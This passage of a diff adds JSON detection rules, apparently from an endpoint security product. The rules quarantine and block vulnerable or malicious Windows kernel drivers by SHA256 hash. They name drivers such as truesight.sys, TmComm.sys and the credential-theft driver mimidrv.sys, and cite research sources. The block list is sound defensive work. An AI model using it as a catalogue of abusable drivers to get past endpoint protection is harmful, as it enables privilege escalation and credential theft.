[], + "type": "hash", + "value": "5e8a5adfd141736db5c947223a1af06dd03f70042abcaa752b17ccdaa4d9875c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a961f377-057a-5de7-8c91-e51869e4a61c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149057Z", + "creation_date": "2026-03-23T11:45:31.149059Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149064Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "17cc31dcac3a7e10a0f15b71ab36ed6b8c5fae610f2c83e16b93eba184479eb7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a989bb3d-7634-5588-9310-21cfc24a46f2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154466Z", + "creation_date": "2026-03-23T11:45:31.154468Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154473Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "1851a1ba633ec04fed253c346f4e0e7530fcf8256e0c385f3c63e0b868d5e662", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a98d4993-24ff-54f7-925f-3bcac49eb1d9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144559Z", + "creation_date": "2026-03-23T11:45:32.144561Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144567Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "312c83a99928c30c1fc55a0a1e7571a63b0e04391abe3392115bb3b7e3f60f47", + "comment": "Malicious Kernel Driver (aka driver_312c83a9.sys) [https://www.loldrivers.io/drivers/495f0f36-c5e0-467d-8115-b5bdbe7ff686/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a98ff7cc-2848-53ef-a38a-618805b4667a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814467Z", + "creation_date": "2026-03-23T11:45:31.814470Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814478Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "afdc52dfd0928505e0246158978dff460e0697cc2b387c5bb52b0fe328a1d170", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a9937cb7-ca64-5f66-a804-94bd07670358", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826843Z", + "creation_date": "2026-03-23T11:45:30.826846Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826854Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8d3c53ae698e17f331383a93990e2468c1bfd6a36a4830ffa9582ceb60d824dd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a9a94c6b-ee1b-5f9f-bf37-ea258378241f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826169Z", + "creation_date": "2026-03-23T11:45:30.826171Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826177Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ae74282bb4343f3e9c15462b67afff3f737de22f8d238751aff767c5d750959", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a9aac860-6f84-56b0-a872-d906d159fa3b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.481043Z", + "creation_date": "2026-03-23T11:45:30.481045Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481050Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2695390a8a7448390fe383beb1eee06d582202683f0273d6e72ef39a8cf709e1", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a9b60390-67d3-5be2-814a-16376b529e3b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982086Z", + "creation_date": "2026-03-23T11:45:29.982088Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982094Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2bf29a2df52110ed463d51376562afceac0e80fbb1033284cf50edd86c406b14", + "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a9e1278d-db32-5f25-8987-ebad5525027b", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836577Z", + "creation_date": "2026-03-23T11:45:30.836579Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836584Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eafc2ce205bbdd326250823d82060acc957a1bc13b7af76939409db6e43210c5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a9e31460-4b9b-5f36-b53c-33467990d52d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152134Z", + "creation_date": "2026-03-23T11:45:31.152137Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.152145Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ac1a83279e35ee1e9537886adc1c5b5b3d4976a80ed52febf6ca416a5dde6055", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a9e6cf8a-3898-552f-ab94-a0da0ba58c15", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147112Z", + "creation_date": "2026-03-23T11:45:31.147114Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147119Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ec6bd4ea58f2a1eb2aa827f40c145c0271a36a7400309b83ce7598d4a0dd765", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a9f22e57-d81d-59d6-8fc9-e7440cbab55c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455361Z", + "creation_date": "2026-03-23T11:45:30.455364Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455373Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62a17c9ec21461badecd1c25744a42bf5c9c0ed39b979fb07ca817f30c862a35", + "comment": "Vulnerable Kernel Driver (aka VBoxUSB.Sys) [https://www.loldrivers.io/drivers/70fa8606-c147-4c40-8b7a-980290075327/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a9fd75bf-b113-5e5e-b35c-5f66f7e2c301", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831200Z", + "creation_date": "2026-03-23T11:45:30.831202Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831208Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"f523e46679c9b40f5bf4831e3cb60d90bd27b1acd3b4b7a12e1fc9ae06fdb5ed", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aa077870-661f-577c-b335-fcf15ece173c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973793Z", + "creation_date": "2026-03-23T11:45:29.973795Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973800Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "80a59ca71fc20961ccafc0686051e86ae4afbbd4578cb26ad4570b9207651085", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aa0b4dbb-d53c-56c0-92e9-d7eb56fc4092", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": 
{ + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823070Z", + "creation_date": "2026-03-23T11:45:30.823072Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823078Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "039f442ffbda7decaaf1e367db6fc6f28cc73d549527ef5bedf2be8badedbfd7", + "comment": "Vulnerable Kernel Driver (aka FH-EtherCAT_DIO.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aa10c950-dc1e-5287-8cc5-417bbb892544", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981926Z", + "creation_date": "2026-03-23T11:45:29.981929Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981934Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f05f74ebae7e65d389703d423445ffb269e657d8278b0523417e1f72b0228eb", + "comment": "Vulnerable Kernel Driver (aka TGSafe.sys) [https://www.loldrivers.io/drivers/ad693146-4adf-4407-bb20-f2505e34c226/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aa11682b-5e88-56a8-8d73-94eb6b434619", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470162Z", + "creation_date": "2026-03-23T11:45:30.470165Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470174Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea318c5300b57b35e07b4c16453a660cd5ce059cdb6578d3057e848e14d68eac", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aa12f38e-232c-5b95-abbd-37d419dcab44", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493400Z", + "creation_date": "2026-03-23T11:45:31.493402Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493408Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7198c9e16ef10a701abbae9422755d904e730893724988b3f63226ad499de02", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aa3bb407-fea5-5f50-8ed7-027961654c59", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821890Z", + "creation_date": "2026-03-23T11:45:31.821892Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821898Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a87f78a357f9eccc2aa6a04ff5b70d6044d3c6b0ba436d0c4199f3e57272c32", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aa3eb61c-c864-5911-b77b-3645b42e5207", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815850Z", + "creation_date": "2026-03-23T11:45:31.815852Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815857Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6e4cf5d2df79e2f561c228b3cbbdb6e1c5b0eff9e62144b4a97d5d128669de80", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aa42c9d7-a497-5ac7-8478-e0e5a2057f15", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146818Z", + "creation_date": "2026-03-23T11:45:32.146821Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146826Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e7c62daf3da6ea70530adc9a65bd97dcdb4afe0b82e7622f6d965bdaa99025b", + "comment": "Vulnerable Kernel Driver (aka CSAgent.sys) [https://www.loldrivers.io/drivers/9974b134-7fee-4c7a-9b0d-38b3b2d7e957/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aa48bdd3-1493-52b5-9721-fd29a6097523", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475666Z", + "creation_date": "2026-03-23T11:45:31.475670Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475680Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "433fc3f44a990949b876015da853a4ff4e7a7c6d0a62eeadf795489b4e15843b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aa5714ae-a23b-5f7e-8b6b-279b465d2315", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818486Z", + "creation_date": "2026-03-23T11:45:30.818488Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818494Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e8b51ab681714e491ab1a59a7c9419db39db04b0dd7be11293f3a0951afe740e", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aa6058e1-bd62-5153-b892-73498bae1706", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478272Z", + "creation_date": "2026-03-23T11:45:31.478287Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478319Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "38e52e61ea71ac13f8f12e6aef2ac4d9e580e1d8b25dbb405e005599a4a4b13d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller 
